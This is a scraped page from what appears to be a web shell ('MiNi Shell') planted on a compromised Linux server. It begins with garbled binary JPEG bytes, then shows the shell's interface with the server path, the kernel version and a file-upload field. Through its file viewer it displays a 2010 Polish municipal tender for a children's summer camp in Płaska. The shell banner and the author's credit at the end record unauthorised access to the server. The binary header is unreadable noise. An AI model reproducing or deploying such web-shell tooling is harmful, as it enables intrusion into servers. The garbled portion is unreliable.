JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100712/204618-N-2010.html

<p class="kh_header"><b>Płaska: Organizacja obozu letniego dla dzieci i młodzieży w ramach realizacji projektu Nr LT - PL / 083 Rozwój działań połączonych służb ratownictwa i ochrony przeciwpożarowej na pograniczu polsko - litewskim, współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Polska - Litwa 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 204618 - 2010; data zamieszczenia: 12.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Płaska , Płaska 53, 16-326 Płaska, woj. podlaskie, tel. 087 6439080, faks 087 6439081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja obozu letniego dla dzieci i młodzieży w ramach realizacji projektu Nr LT - PL / 083 Rozwój działań połączonych służb ratownictwa i ochrony przeciwpożarowej na pograniczu polsko - litewskim, współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Polska - Litwa 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje organizację obozu letniego dla dzieci i młodzieży. Ilość uczestników: 65 uczniów szkół gimnazjalnych oraz VI klasy podstawowej (w wieku 13-16 lat),  w tym: z Gminy Płaska - 45 osób, z Gminy Krasnopol - 10 osób, z Gminy Puńsk - 10 osób. Wykonanie zamówienia winno nastąpić w wymaganym okresie daty obozu tj. od  08.08 do 16.08.2010 r.
Przyjazd uczestników obozu w dniu: 08.08.2010 r. w godzinach popołudniowych od 15:00 do 18:00, wyjazd 16.08.2010 r. w godzinach przedpołudniowych 10:00 - 12:00.
Czas trwania obozu: 7 pełnych dni.
Płatność po zakończeniu obozu w terminie do 14 dni od daty doręczenia faktury.

3. Miejsce realizacji zamówienia - teren Gminy Płaska.	

4.  Obowiązki Wykonawcy zamówienia. 
Cena obejmuje zapewnienie uczestnikom obozu: zakwaterowania (miejsca noclegowe) w miejscu zapewniającym dostęp do jeziora, całodziennego wyżywienia, bazy treningowej oraz opieki wychowawczą i trenerskiej. Wykonawca musi zabezpieczyć  także dostęp do sali gimnastycznej, sali treningowej z zapleczem OSP oraz co najmniej 2 opiekunów władających językiem polskim i litewskim.
Do obowiązków Wykonawcy należy zapewnienie uczestnikom obozu letniego:

1) zakwaterowania
a. w obiekcie  ze stołówką na min. 65 osób oraz dużą świetlicą - wyposażoną w minimum w sprzęt RTV i dyskotekowy;
b. budynki , domki lub pawilony usytuowane na terenie ogrodzonym, oświetlonym, z dostępem do kompleksu rekreacyjno-sportowego (np.: boisko do gry w piłkę nożną, siatkówkę stół do tenisa stołowego ( wraz z niezbędnym sprzętem: piłki do piłki nożnej, siatkówki rakietki do ping ponga), miejsce na ognisko;
c. pokoje  wyposażone w niezbędny sprzęt z możliwością swobodnego rozpakowania bagażu, do każdego łóżka przynależna szafka lub minimum 1 półka w szafie dla uczestnika/uczestniczki obozu, pokoje bez łóżek piętrowych;
d. łazienki ( w budynku, w którym zakwaterowani będą uczestnicy obozu) wyposażone w  WC, umywalki oraz stanowiska prysznicowe z ciepłą i zimną wodą;
Sale, pokoje i łazienki muszą być estetyczne i czyste;
Zamawiający wymaga, aby uczestnicy zakwaterowani byli razem z opiekunem, w tym samym budynku.

2) transportu
a. Wykonawca zapewni transport uczestnikom obozu z miejsca obozu  na wycieczki, własnymi lub udostępnionymi przez firmę przewozową klimatyzowanymi autokarami. W dniu wyjazdu Zamawiający zastrzega sobie możliwość wezwania Policji w celu sprawdzenia stanu technicznego autokaru.

b) transport uczestników obozu do miejsca obozu i z powrotem zapewniają samorządy Puńsk, Kransopol, Płaska.

3) wyżywienia :
a. minimum 3 posiłków dziennie, w tym:
- śniadania
- obiadu ( I i II danie oraz deser)
- kolacji,
do każdego posiłku napoje (do wyboru uczestnika): herbata, zimny napój. Wykonawca powinien zapewnić nieograniczony dostęp do napojów. Pierwszym posiłkiem w dniu przyjazdu oraz ostatnim w dniu wyjazdu będzie obiad.
Wykonawca zapewni suchy prowiant na czas wycieczek.

4) ubezpieczenia ;
a. na czas przejazdu, pobytu, wycieczek;
b. obowiązek posiadania ubezpieczenia od OC;
Uczestnicy muszą być ubezpieczeni od następstw nieszczęśliwych wypadków.

5) opieki medycznej;
Wykonawca zapewni całodobową opiekę pielęgniarską na terenie ośrodka, w miejscu pobytu oraz zabezpieczenie podstawowych leków i materiałów opatrunkowych, opiekę lekarską polegająca na wezwaniu lekarza do ośrodka lub dowiezienie uczestnika do przychodni bezpłatnym transportem.

6) kadry pedagogicznej:
- minimum 1 opiekun na 15-stu uczestników obozu, 1 kierownik na  turnus obozu. Osoby te powinny posiadać kwalifikacje i umiejętności, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 z późn. zm.).
- 4 opiekunów, w tym 2 osoby (opiekun i opiekunka) posługujących się językiem litewskim i polskim.

7) programu zajęć:
a. Wykonawca powinien opracować program zajęć na czas pogody i niepogody;
b. program zajęć powinien uwzględniać , co najmniej:
- opracowanie programu rekreacyjno-edukacyjnego;
- organizacje zajęć edukacyjnych o tematyce ratownictwa i ochrony przeciwpożarowej;
- organizacja zajęć edukacyjnych z ratownictwa wodnego,
- organizacje ogniska;
- organizacja spływu kajakowego,
- organizacja gry paintball,
- organizacje pieszych wycieczek;
- organizowanie zajęć i rozgrywek sportowych;
- inne zaplanowane przez opiekunów zajęcia zgodne z potrzebami uczestników obozu oraz celami wychowawczymi.

8) przekazanie Zamawiającemu dokumentacji z organizacji obozu letniego, w tym:
- listy uczestników obozu;
- dokumentacji fotograficznej w formie papierowej i elektronicznej.

Informacje dodatkowe:
Obóz letni należy zorganizować zgodnie z:
a. Rozporządzeniem Prezesa Rady Ministrów z dnia 6 maja 1997r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, kąpiących się pływających i uprawiających sporty wodne (Dz. U. Nr 57, poz. 358 z późn.zm.);
b. Ustawą z dnia 29 sierpnia 1997r. o usługach turystycznych (Dz. U. Nr 223, poz. 2268 z późn. zm.);
c. Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 08.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie z wzorem druku stanowiącym załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z wzorem druku stanowiącym załącznik nr 4 do SIWZ  
Przedłożony wykaz powinien zawierać co najmniej 5 osób, w tym:
a)	co najmniej 1 osobą posiadającą kwalifikacje odpowiednie dla kierownika obozu, stosowane do wymogów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej oraz zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 z późn. zm.);
b)	co najmniej 4 osobami posiadającymi kwalifikacje odpowiednie dla wychowawców, stosowanie do wymogów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej oraz zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 z późn. zm.);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany wzór umowy (stanowiący załącznik nr 6 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug-plaska.pbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Płaska
Płaska 53, 16 - 326 Płaska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2010 godzina 09:00, miejsce: Urząd Gminy Płaska
Płaska 53, 16 - 326 Płaska
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja zamówienia w ramach projektu Nr LT - PL / 083 Rozwój działań połączonych służb ratownictwa i ochrony przeciwpożarowej na pograniczu polsko - litewskim, współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Polska - Litwa 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com